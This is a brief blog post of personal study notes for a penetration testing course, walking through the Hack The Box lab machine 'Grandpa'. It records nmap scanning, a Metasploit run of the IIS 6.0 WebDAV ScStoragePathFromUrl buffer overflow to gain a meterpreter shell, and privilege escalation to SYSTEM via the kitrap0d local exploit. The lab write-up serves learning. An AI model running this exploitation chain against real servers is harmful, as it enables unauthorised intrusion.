TCM PEH Hacking Grandpa Notes

on March 24, 2021 under certs

1 minute read

HTB Grandpa

These are getting old

nmap -A -T4 -p- 10.10.10.14
Noted port 80 open
Noted port 80 IIS 6.0
Noted potentially risky methods (trace,put,propfind,search,lock,unlock,delete,move,mkcol)
Noted Windows Server 2003 OS guess
Googled IIS 6.0 exploit
Found exploit-db WebDAV ScStoragePathFromUrl exploit remote buffer overflow
Read through exploit, looks like it might work
searchsploit ScStoragePathFromUrl
Noted modules exist

msfconsole
seach ScStoragePathFromUrl
Noted results
use 0
options
set rhosts tun0
show targets
exploit
Noted no session created
exploit
Noted no session created
set lport 5555
exploit
Noted no session created
exploit
Noted meterpreter shell (wtf)
getuid
Access denied
sysinfo
ps
migrate 1788
Noted migration successful, am now Network Service

background
search suggester
use 0
options
set session 1
run
Noted several exploits appears to be vulnerable

use exploit/windows/local/ms10_015_kitrap0d
options
set session 1
exploit
Noted failed, on wrong IP still because lhost option not yet present
set lhost tun0
exploit
Noted meterpreter shell
sysinfo
getuid
Noted am Authority System

certs, pwned

I feedback.
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!